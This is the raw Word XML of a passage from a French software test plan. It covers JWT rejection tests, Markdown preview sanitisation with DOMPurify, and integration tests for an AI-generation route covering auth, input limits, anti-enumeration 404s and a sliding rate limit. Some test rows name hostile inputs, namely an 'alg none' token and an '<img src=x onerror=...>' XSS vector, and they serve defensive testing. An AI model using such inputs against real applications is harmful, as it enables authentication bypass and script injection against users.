              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rejeté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeton signé avec une autre clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rejeté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeton dont l'algorithme est passé à</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rejeté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TU-15 couvre la classe d'attaque par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">confusion d'algorithme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>relevée dans la veille (CVE-2026-48526, § 11). Le projet n'est pas affecté par cette CVE, mais la propriété qu'elle exploite — un vérificateur qui accepte l'algorithme annoncé par le jeton lui-même — mérite un test permanent plutôt qu'une vérification ponctuelle.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="Xa379061b23f392238b77ec433e41b9583a15109"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vitest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">couvre deux points du composant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MarkdownEditor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 7.1) :</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TU-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">insertMarkdown("**","**")</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">avec sélection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le balisage entoure la sélection, curseur après</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">insertMarkdown</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sans sélection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le texte d'amorce est inséré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">previewHtml</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sur du Markdown légitime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Titres, listes et emphase rendus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">previewHtml</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sur</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src=x onerror=...&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">L'attribut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">onerror</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">est retiré par DOMPurify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="128" w:name="Xa491511a88a8024de66ee828426abad3c71da08"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tests d'intégration des routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ces tests exercent une route complète, du corps de la requête HTTP jusqu'à la base. Ils sont écrits d'abord sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /documents/&lt;id&gt;/ia/generer</w:t>
      </w:r>
      <w:r>
        <w:t>, la route la plus riche en contrôles (§ 5.7), puis déclinés sur les autres.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TI-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sans en-tête</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">401</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type_action</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hors liste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, aucune ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">scope</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hors liste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">contenu</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">vide ou absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">contenu</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>de 3 001 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">instructions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">de 501 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document appartenant à un autre utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— jamais</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">403</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document inexistant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">404</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, réponse identique à TI-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cas nominal,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">call_ollama</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">simulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, une ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">tokens_used</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">renseigné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">21ᵉ appel dans la fenêtre de 24 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">429</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, aucune ligne ajoutée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20ᵉ appel dont un daté de 25 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">201</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— la fenêtre est bien glissante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TI-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">call_ollama</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">lève</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">RuntimeError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">502</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">aucune</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ligne dans</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatre de ces cas testent des décisions de conception plutôt que du code, et ce sont les plus importants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TI-07 et TI-08 doivent produire des réponses indiscernables.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>C'est la mesure anti-énumération du § 5.7. Le test compare non seulement les deux codes de statut mais les deux corps de réponse : une différence de message rétablirait la fuite d'information que le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sert précisément à fermer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4044549" cy="989112"/>
            <wp:docPr id="62" name="Picture 62"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="45d1eae90921-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4044549" cy="989112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TI-11 vérifie que la fenêtre est glissante et non calendaire.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Le test insère 19 appels datés de moins de 24 heures et un appel daté de 25 heures, puis demande une génération : elle doit réussir. Un compteur remis à zéro à minuit passerait TI-10 mais échouerait TI-11. C'est donc bien le mécanisme du § 5.7 qui est vérifié, et non son résultat apparent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TI-12 vérifie qu'un échec ne consomme pas de quota.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le test compte les lignes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avant et après un appel dont le double lève</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RuntimeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et exige l'égalité. C'est la conséquence du placement du</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">après le retour du modèle — une propriété que trois lignes déplacées suffiraient à casser, et qu'aucune erreur ne signalerait.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les mêmes familles de cas sont déclinées sur les autres routes :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
